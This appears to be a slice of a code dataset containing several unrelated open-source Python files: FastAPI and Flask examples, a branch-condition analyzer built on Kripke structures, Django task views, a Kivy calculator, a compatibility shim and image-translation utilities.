\n# @Date : 2020/7/17 16:16\n# @IDE : PyCharm\nfrom fastapi import FastAPI\n\n\napp = FastAPI()\nfake_item_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\n@app.get(\"/items\")\nasync def read_item(skip: int = 0, limit: int = 10):\n '''\n @description: \n @param {type} \n @return: \n ''' \n return fake_item_db[skip : skip + limit]\n\n\n@app.get(\"/i/\")\nasync def i(A: str = \"HI...\", B: str = \"Hello, jack\", C: str = \"He..\"):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"ii\")\nasync def ii(A: int = 0, B: int = 10, C: int = 20):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"iii\")\nasync def iii(A: int = 0, B: int = 10, C: int = 20):\n return \"A+B+C\", A+B+C\n\n\n# bool 类型强制转换\n@app.get(\"/xxx/{item_id}\")\nasync def xxx(item_id: str, QQ: str = None, SS: bool = False):\n '''\n @description: \n @param {type}:\n QQ 为 选填参数。\n item_id 为必填参数。\n SS: 为选填参数。 \n @return: \n '''\n item = {\"item_id\": item_id}\n if QQ:\n item.update(\n {\"QQ\": QQ}\n )\n if not SS:\n item.update(\n {\"item_id\": \"This is SSSSSSS(n个s)\"}\n )\n return item\n\n\n# 多路径 和 查询参数 和 必填字段\n@app.get(\"/user/{user_id}/item/{item_id}\")\nasync def read_user_item(\n user_id: int, item_id: str, q: str = None, short: bool = False\n):\n item = {\"item_id\": item_id, \"owner_id\": user_id}\n if q:\n item.update(\n {\"q\": q}\n )\n if not short:\n item.update(\n {\"description\": \"This is an amazing item that has a long description\"}\n )\n return item \n\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n\n", "repo_name": "liushuangdan/FastAPIStudy", "sub_path": "src/FastAPIBook/step2_api/8_query_parameters.py", "file_name": "8_query_parameters.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.FastAPI", "line_number": 35, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "15515001302", "text": "from __future__ import annotations\n\nimport ast\nimport inspect\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import reduce\nfrom typing import Any, Callable, Sequence, cast\n\nfrom .instrumentation import variable_name\nfrom .kripke import Kripke, State\n\n\nclass Comparison(Enum):\n \"\"\"Representation of the comparison operators <=, >=\n\n This class is confined to the operators that include equality because they are the easiest to\n support as STL formulas.\n\n Attributes:\n LTE: less than or equal to operator\n GTE: greater than or equal to operator\n \"\"\"\n\n LTE = auto()\n GTE = auto()\n\n def inverse(self) -> Comparison:\n \"\"\"Invert the comparion.\n\n Returns:\n The inverse comparison operator\n \"\"\"\n\n if self is Comparison.LTE:\n return Comparison.GTE\n\n if self is Comparison.GTE:\n return Comparison.LTE\n\n raise ValueError(f\"Unknown comparison type {self}\")\n\n @staticmethod\n def from_op(node: ast.cmpop) -> Comparison:\n \"\"\"Create a comparison from an AST node.\n\n Args:\n op: The AST comparison operator node\n\n Returns:\n The comparison operator of the node\n\n Raises:\n TypeError: If op is not an AST comparison node\n \"\"\"\n\n if isinstance(node, ast.LtE):\n return Comparison.LTE\n\n if isinstance(node, ast.GtE):\n return Comparison.GTE\n\n raise TypeError(f\"Unsupported comparison operator {node}\")\n\n\nclass InvalidConditionExpression(Exception):\n # pylint: disable=C0115\n pass\n\n\ndef _cmp_nonstrict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left <= right\n\n if cmp is Comparison.GTE:\n return left >= right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\ndef _cmp_strict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left < right\n\n if cmp is Comparison.GTE:\n return left > right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\n@dataclass\nclass Condition:\n \"\"\"Representation of the boolean expression of a conditional statement.\n\n This representation assumes that the condition is represented as an inequality, with a variable\n on at least one side of the equation.\n\n Attributes:\n variable: The name of the variable on the left side of the comparison\n comparison: The comparison operator\n bound: The value or variable on the right side of the comparison\n strict: Whether the inequality is strict (<, >) or nonstrict (<=,>=)\n\n \"\"\"\n\n variable: str\n comparison: Comparison\n bound: str | float\n strict: bool = False\n\n def inverse(self) -> Condition:\n \"\"\"Invert the condition.\n\n If the condition is nonstrict, its inverse will be strict and vice versa. This function\n returns a new Condition instance rather than modifying the existing one.\n\n Returns:\n A new Condition with the comparison inverted\n \"\"\"\n return Condition(self.variable, self.comparison.inverse(), self.bound, not self.strict)\n\n def is_true(self, variables: dict[str, float]) -> bool:\n \"\"\"Check if a condition is true given a set of variables.\n\n If a variable is not present in the map, then the condition is assumed to be false.\n\n Args:\n variables: Mapping from variable names to values\n\n Returns:\n True if the condition is true, False otherwise\n\n Raises:\n ValueError: If the value in the comparison attribute is not the Comparison type\n \"\"\"\n\n try:\n left = variables[self.variable]\n except KeyError:\n return False\n\n try:\n right = variables[self.bound] if isinstance(self.bound, str) else self.bound\n except KeyError:\n return False\n\n if self.strict:\n return _cmp_strict(left, self.comparison, right)\n\n return _cmp_nonstrict(left, self.comparison, right)\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the condition.\"\"\"\n\n if isinstance(self.bound, str):\n return {self.variable, self.bound}\n\n return {self.variable}\n\n @classmethod\n def from_expr(cls, expr: ast.expr) -> Condition:\n \"\"\"Create a Condition from an AST expression node.\n\n This class method assumes that the comparison expression only has a single operand. This is\n not always the case in Python as the expression \"10 <= x <= 20\" is a valid comparison and\n is represented by having several operands in the expression AST node.\n\n Args:\n expr: The AST expression node\n\n Returns:\n A Condition instance representing the AST comparison expression\n\n Raises:\n InvalidConditionExpresssion: If the expr value is not an ast.Compare type\n TypeErrror: If the expression does not conform to the condition assumptions\n \"\"\"\n\n if not isinstance(expr, ast.Compare):\n raise InvalidConditionExpression(f\"Unsupported expression type {type(expr)}\")\n\n left = expr.left\n comparison = Comparison.from_op(expr.ops[0])\n right = expr.comparators[0]\n variable_nodes = (ast.Name, ast.Attribute)\n\n if isinstance(left, variable_nodes) and isinstance(right, variable_nodes + (ast.Constant,)):\n if isinstance(right, variable_nodes):\n return cls(variable_name(left), comparison, variable_name(right))\n\n if isinstance(right, ast.Constant) and isinstance(right.value, (int, float)):\n return cls(variable_name(left), comparison, float(right.value))\n\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n if isinstance(left, ast.Constant) and isinstance(right, variable_nodes):\n if not isinstance(left.value, (int, float)):\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n return cls(variable_name(right), comparison.inverse(), float(left.value))\n\n raise TypeError(\"Invalid comparison expression\")\n\n @classmethod\n def lt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.LTE, bound, strict)\n\n @classmethod\n def gt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.GTE, bound, strict)\n\n\n@dataclass\nclass BranchTree:\n \"\"\"Representation of a tree of conditional blocks.\n\n A tree represents an independent conditional statement i.e. a single if-else block. This tree\n has two sets of children, one of the conditional statements found in the true block of the\n conditional statement, and one of the conditional statements found in the false block.\n\n Attributes:\n condition: The boolean guard of the conditional block\n true_children: Sub-trees found in the block associated with the condition being true\n false_children: Sub-trees found in the block associated with the condition being false\n \"\"\"\n\n condition: Condition\n true_children: list[BranchTree]\n false_children: list[BranchTree]\n\n def as_kripke(self) -> list[Kripke[Condition]]:\n \"\"\"Convert tree of conditions into a Kripke Structure.\"\"\"\n\n if len(self.true_children) == 0:\n true_kripkes = [Kripke.singleton([self.condition])]\n else:\n true_kripkes = [\n kripke.add_labels([self.condition])\n for child in self.true_children\n for kripke in child.as_kripke()\n ]\n\n inv_cond = self.condition.inverse()\n\n if len(self.false_children) == 0:\n false_kripkes = [Kripke.singleton([inv_cond])]\n else:\n false_kripkes = [\n kripke.add_labels([inv_cond])\n for child in self.false_children\n for kripke in child.as_kripke()\n ]\n\n return [tk.join(fk) for tk in true_kripkes for fk in false_kripkes]\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the tree, including its children.\"\"\"\n\n variables = self.condition.variables\n\n for child in self.true_children:\n variables = variables.union(child.variables)\n\n for child in self.false_children:\n variables = variables.union(child.variables)\n\n return variables\n\n @staticmethod\n def from_function(func: Callable[..., Any]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from an arbitrary python function.\n\n The set of BranchTrees that represent all of the independent conditional statements in the\n function body. In other words, the size of the output set should be the same as the number\n of independent if-else blocks in the function. In order to analyze this function, the\n python source of the function should be available.\n\n Args:\n func: The python function to analyze\n\n Returns:\n A set of BranchTrees representing all independent conditional statements in the function\n\n Raises:\n OsError: If the source code of the function is not available\n \"\"\"\n\n mod_def = ast.parse(inspect.getsource(func))\n func_def = cast(ast.FunctionDef, mod_def.body[0])\n return _block_trees(func_def.body)\n\n\ndef _expr_trees(expr: ast.expr, tcs: list[BranchTree], fcs: list[BranchTree]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from a conditional statement expression.\n\n This function generates a set of trees in order to handle the cases in which the conditional\n statement expression contains either a boolean conjunction or disjunction operator. In the\n case of the conjunction, we traverse the set of operands generating a new tree with the operand\n as the condition and the previous tree as a true child. In the case of disjunction, we traverse\n the set of operands and create a new tree for each operand with the same children for each.\n\n Args:\n expr: The conditional statement expression\n tcs: The set of BranchTrees generated from the true block body\n fcs: The set of BranchTrees generated from the false block body\n\n Returns:\n A set of BranchTrees created from the expression\n\n Raises:\n TypeError: If the condition expression node is not a supported type\n \"\"\"\n # pylint: disable=W0105\n\n if not isinstance(expr, ast.BoolOp):\n condition = Condition.from_expr(expr)\n tree = BranchTree(condition, tcs, fcs)\n return [tree]\n\n if isinstance(expr.op, ast.And):\n \"\"\"In this case, we compose a single tree by iteratively stacking BranchTrees for each\n operand. We explore this approach in the following example.\n\n Given the following condition:\n\n if x <= 5 and y <= 10:\n do_true()\n else:\n do_false()\n\n We can see that this can be re-written as the following:\n\n if x <= 5:\n if y <= 10:\n do_true()\n else:\n do_false()\n else:\n do_false()\n\n The re-written condition can now be analyzed recursively to produce a BranchTree.\n \"\"\"\n\n init = _expr_trees(expr.values[-1], tcs, fcs)\n trees = reduce(lambda ts, e: _expr_trees(e, ts, []), reversed(expr.values[:-1]), init)\n return list(trees)\n\n if isinstance(expr.op, ast.Or):\n \"\"\"In this case, we create a set of trees by iterating over the set of operands and\n creating new trees with the same children. Consider the following example.\n\n Given the following condition:\n\n if x <= 5 or y <= 10:\n do_true()\n else:\n do_false()\n\n This can be re-written as the following:\n\n if x <= 5:\n do_true()\n else:\n do_false()\n\n if y <= 10:\n do_true()\n else:\n do_false()\n\n The re-written condition can now be analyzed into a set of independent BranchTrees.\n \"\"\"\n\n return [tree for e in expr.values for tree in _expr_trees(e, tcs, fcs)]\n\n raise TypeError(f\"Unsupported expression type {type(expr)}\")\n\n\ndef _block_trees(block: Sequence[ast.stmt]) -> list[BranchTree]:\n \"\"\"Create a set of trees from a block of python statements.\n\n Each BranchTree in the set represents an independent conditional statement in the block. The\n true and false blocks of each statement are recursively analyzed to find the child BranchTrees.\n\n Args:\n block: The set of python statements in the block\n\n Returns:\n A set of BranchTrees representing the independent conditional statements in the block\n \"\"\"\n\n block_trees = []\n conditions = [stmt for stmt in block if isinstance(stmt, ast.If)]\n\n for stmt in conditions:\n true_children = _block_trees(stmt.body)\n false_chilren = _block_trees(stmt.orelse)\n\n try:\n stmt_trees = _expr_trees(stmt.test, true_children, false_chilren)\n except InvalidConditionExpression:\n pass\n else:\n block_trees.extend(stmt_trees)\n\n return block_trees\n\n\ndef active_branches(kripke: Kripke[Condition], variables: dict[str, float]) -> list[State]:\n \"\"\"Compute branches that are active given a set of variables.\n\n Args:\n kripke: The kripke structure containing states representing conditional branches\n variables: The set of variable values the state labels depend on\n\n Returns:\n The list of states that are active given the set of variables.\n \"\"\"\n\n def is_active(state: State) -> bool:\n return all(label.is_true(variables) for label in kripke.labels_for(state))\n\n return [state for state in kripke.states if is_active(state)]\n\n\n__all__ = [\"BranchTree\", \"Comparison\", \"Condition\", \"active_branches\"]\n", "repo_name": "cpslab-asu/branch-statement-analyzer", "sub_path": "src/bsa/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 14114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 25, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 26, "usage_type": "call"}, {"api_name": "ast.cmpop", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ast.LtE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "ast.GtE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "ast.expr", "line_number": 162, "usage_type": "attribute"}, {"api_name": "ast.Compare", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Constant", "line_number": 188, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 190, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 192, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 193, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 197, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 201, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 91, "usage_type": "name"}, {"api_name": "kripke.Kripke.singleton", "line_number": 236, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 236, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 239, "usage_type": "call"}, {"api_name": "kripke.Kripke.singleton", "line_number": 247, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 247, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 250, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 272, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "ast.parse", "line_number": 290, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 290, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 291, "usage_type": "call"}, {"api_name": "ast.FunctionDef", "line_number": 291, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 214, "usage_type": "name"}, {"api_name": "ast.expr", "line_number": 295, "usage_type": "attribute"}, {"api_name": "ast.BoolOp", "line_number": 317, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 322, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 347, "usage_type": "call"}, {"api_name": "ast.Or", "line_number": 350, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 381, "usage_type": "name"}, {"api_name": "ast.stmt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "ast.If", "line_number": 395, "usage_type": "attribute"}, {"api_name": "kripke.Kripke", "line_number": 411, "usage_type": "name"}, {"api_name": "kripke.State", "line_number": 422, "usage_type": "name"}, {"api_name": "kripke.labels_for", "line_number": 423, "usage_type": "call"}, {"api_name": "kripke.states", "line_number": 425, "usage_type": "attribute"}, {"api_name": "kripke.State", "line_number": 411, "usage_type": "name"}]} +{"seq_id": "23740878730", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.views.generic import FormView\nfrom Home.forms import CustomUserCreationForm, TaskForm\nfrom django.contrib.auth import login\n\nfrom Home.models import Task\n# Create your views here.\n\nclass HomeView(TemplateView):\n template_name = \"home.html\"\n\nclass TasksView(FormView):\n template_name = \"tasks.html\"\n form_class = TaskForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.user = request.user\n task.save()\n return redirect(\"Tasks\")\n return render(request, self.template_name)\n\nclass RegisterView(FormView):\n template_name = \"registration/register.html\"\n form_class = CustomUserCreationForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"Home\")\n\nclass MusicView(TemplateView):\n template_name = \"music.html\"\n\ndef delete(request, id):\n task = Task.objects.get(id=id)\n task.delete()\n return HttpResponseRedirect(reverse('Tasks'))", "repo_name": "Mathis-Armstrong/TaskFocus", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 15, "usage_type": "name"}, {"api_name": "Home.forms.TaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.generic.FormView", "line_number": 28, "usage_type": "name"}, {"api_name": "Home.forms.CustomUserCreationForm", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 39, "usage_type": "name"}, {"api_name": "Home.models.Task.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "Home.models.Task.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Home.models.Task", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "4220175604", "text": "from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.utils import get_color_from_hex\n\n\nclass MainApp(App):\n\n def build(self):\n\n self.buttons = [[\"7\", \"8\", \"9\", \"/\"],\n [\"4\", \"5\", \"6\", \"*\"],\n [\"1\", \"2\", \"3\", \"-\"],\n [\".\", \"0\", \"C\", \"+\"],\n [\"=\"]\n ]\n self.operators = [\"/\", \"*\", \"-\", \"+\"]\n\n self.azul = '#56DEFF'\n\n self.solution = TextInput(readonly=True, text='')\n self.main_layout = BoxLayout(orientation=\"vertical\", spacing=10, padding=10)\n self.main_layout.add_widget(self.solution)\n self.equal_button = Button(text=\"=\", pos_hint={\"center_x\": .5, \"center_y\": .5})\n for row in self.buttons:\n r_layout = BoxLayout()\n for label in row:\n button = Button(text=label, pos_hint={\"center_x\": .5, \"center_y\": .5},\n background_color=get_color_from_hex(self.azul))\n\n button.bind(on_press=self.on_button_press)\n r_layout.add_widget(button)\n self.main_layout.add_widget(r_layout)\n\n return self.main_layout\n\n def on_button_press(self, instance):\n if instance.text != '=' and instance.text != 'C':\n self.solution.text += instance.text\n elif instance.text == 'C':\n self.solution.text = ''\n else:\n try:\n result = eval(self.solution.text)\n self.solution.text = str(result)\n print(result)\n except SyntaxError:\n print(\"Invalid syntax in expression\")\n\n\nif __name__ == '__main__':\n app = MainApp()\n app.run()\n", "repo_name": "alexandrecruzdev/Calculadora-Kivy-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "kivy.app.App", "line_number": 8, "usage_type": "name"}, {"api_name": "kivy.uix.textinput.TextInput", "line_number": 22, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 23, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 25, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "kivy.utils.get_color_from_hex", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "26566118585", "text": "import sys\n\nPY3 = sys.version_info[0] == 3\n\ntry:\n from itertools import izip\n xrange = xrange\nexcept ImportError:\n # py3\n izip = zip\n xrange = range\n# end handle python version\n\ntry:\n # Python 2\n buffer = buffer\n memoryview = buffer\n # Assume no memory view ...\n def to_bytes(i):\n return i\nexcept NameError:\n # Python 3 has no `buffer`; only `memoryview`\n # However, it's faster to just slice the object directly, maybe it keeps a view internally\n def buffer(obj, offset, size=None):\n if size is None:\n # return memoryview(obj)[offset:]\n return obj[offset:]\n else:\n # return memoryview(obj)[offset:offset+size]\n return obj[offset:offset + size]\n # end buffer reimplementation\n # smmap can return memory view objects, which can't be compared as buffers/bytes can ... \n def to_bytes(i):\n if isinstance(i, memoryview):\n return i.tobytes()\n return i\n\n memoryview = memoryview\n\ntry:\n MAXSIZE = sys.maxint\nexcept AttributeError:\n MAXSIZE = sys.maxsize\n", "repo_name": "FelixZFB/Python_prevent_spider", "sub_path": "venv/Lib/site-packages/gitdb/utils/compat.py", "file_name": "compat.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.izip", "line_number": 10, "usage_type": "name"}, {"api_name": "sys.maxint", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "74357896486", "text": "from flask import Flask\nimport threading\nimport time\n\napp = Flask(__name__)\n\n\nt_buff = 0\nf_buff = 0\nh_buff = 0\n\n\n\n@app.route('/get_num_1', methods=[\"GET\"])\ndef get_num_1():\n with open('number.txt', 'r') as f:\n lines = f.readline() \n print(lines)\n t_buff = lines.split()[0]\n f_buff = lines.split()[1]\n h_buff = lines.split()[2]\n\n num_dict = {\n 't': t_buff,\n 'f': f_buff,\n 'h': h_buff,\n }\n return num_dict\n\n\n\n\n@app.route('/get_table', methods=[\"GET\"])\ndef get_table():\n v = {\n 'id': \"100\",\n 'First_Name': \"Y\",\n 'Last_Name': \"D\",\n \"User_Name\": \"C\"\n }\n return v\n\n\nif __name__ == '__main__':\n # t1 = threading.Thread(target=read_from_txt, )\n # t1.start()\n app.run()\n", "repo_name": "dc-ying/dashboard_ui", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "73361110888", "text": "# -*- coding: utf-8 -*-\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\nfrom torchvision import transforms\nfrom data import ImageFilelist, ImageFolder\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nimport torchvision.utils as vutils\nimport yaml\nimport numpy as np\nimport torch.nn.init as init\nimport time\nimport torchfile\nimport random\nimport pickle\nimport resnet\n# Methods\n# get_all_data_loaders : primary data loader interface (load trainA, testA, trainB, testB)\n# get_data_loader_list : list-based data loader\n# get_data_loader_folder : folder-based data loader\n# get_config : load yaml file\n# eformat :\n# write_2images : save output image\n# prepare_sub_folder : create checkpoints and images folders for saving outputs\n# write_one_row_html : write one row of the html file for output images\n# write_html : create the html file.\n# write_loss\n# slerp\n# get_slerp_interp\n# get_model_list\n# load_vgg16\n# load_inception\n# vgg_preprocess\n# get_scheduler\n# weights_init\n\ndef get_all_data_loaders(conf):\n batch_size = conf['batch_size']\n num_workers = conf['num_workers']\n if 'new_size' in conf:\n new_size_a = new_size_b = conf['new_size']\n else:\n new_size_a = conf['new_size_a']\n new_size_b = conf['new_size_b']\n height = conf['crop_image_height']\n width = conf['crop_image_width']\n # data loader\n train_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA'), batch_size, True,\n new_size_a, height, width, num_workers, True, True)\n test_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA'), batch_size, False,\n new_size_a, height, width, num_workers, True, True)\n train_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB'), batch_size, True,\n new_size_b, height, width, num_workers, True, True)\n test_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB'), batch_size, False,\n new_size_b, height, width, num_workers, True, True)\n train_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n train_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n test_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n train_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n train_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train','trainB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n test_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n\n return train_loader_a, train_loader_b, test_loader_a, test_loader_b, train_mask_loader_a, train_mask_loader_b,\\\n test_mask_loader_a, test_mask_loader_b, train_texture_loader_a, train_texture_loader_b, \\\n test_texture_loader_a, test_texture_loader_b\n\ndef get_data_loader_folder(input_folder, batch_size, train, new_size=None,\n height=256, width=256, num_workers=4, crop=True, not_mask=True):\n transform_list = [transforms.ToTensor()]\n transform_list = transform_list + [transforms.Normalize((0.5, 0.5, 0.5),(0.5, 0.5, 0.5))] if not_mask else transform_list\n transform_list = [transforms.CenterCrop((height, width))] + transform_list if crop else transform_list\n transform_list = [transforms.Resize(new_size)] + transform_list if new_size is not None else transform_list\n # transform_list = [transforms.RandomHorizontalFlip()] + transform_list if train else transform_list\n transform = transforms.Compose(transform_list)\n dataset = ImageFolder(input_folder, transform=transform)\n loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False, drop_last=True, num_workers=num_workers)\n return loader\n\n\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\ndef eformat(f, prec):\n s = \"%.*e\"%(prec, f)\n mantissa, exp = s.split('e')\n # add 1 to digits as 1 is taken by sign +/-\n return \"%se%d\"%(mantissa, int(exp))\n\n\ndef __write_images(image_outputs, display_image_num, file_name):\n image_outputs = [images.expand(-1, 3, -1, -1) for images in image_outputs] # expand gray-scale images to 3 channels\n image_tensor = torch.cat([images[:display_image_num] for images in image_outputs], 0)\n image_grid = vutils.make_grid(image_tensor.data, nrow=display_image_num, padding=0, normalize=True, scale_each=True)\n vutils.save_image(image_grid, file_name, nrow=1)\n\n\ndef write_2images(image_outputs, display_image_num, image_directory, postfix):\n n = len(image_outputs)\n __write_images(image_outputs[0:n//2], display_image_num, '%s/gen_a2b_%s.jpg' % (image_directory, postfix))\n __write_images(image_outputs[n//2:n], display_image_num, '%s/gen_b2a_%s.jpg' % (image_directory, postfix))\n\n\ndef prepare_sub_folder(output_directory):\n image_directory = os.path.join(output_directory, 'images')\n if not os.path.exists(image_directory):\n print(\"Creating directory: {}\".format(image_directory))\n os.makedirs(image_directory)\n checkpoint_directory = os.path.join(output_directory, 'checkpoints')\n if not os.path.exists(checkpoint_directory):\n print(\"Creating directory: {}\".format(checkpoint_directory))\n os.makedirs(checkpoint_directory)\n return checkpoint_directory, image_directory\n\n\ndef write_one_row_html(html_file, iterations, img_filename, all_size):\n html_file.write(\"

iteration [%d] (%s)

\" % (iterations,img_filename.split('/')[-1]))\n html_file.write(\"\"\"\n

\n \n
\n

\n \"\"\" % (img_filename, img_filename, all_size))\n return\n\n\ndef write_html(filename, iterations, image_save_iterations, image_directory, all_size=1536):\n html_file = open(filename, \"w\")\n html_file.write('''\n \n \n \n Experiment name = %s\n \n \n \n ''' % os.path.basename(filename))\n html_file.write(\"

current

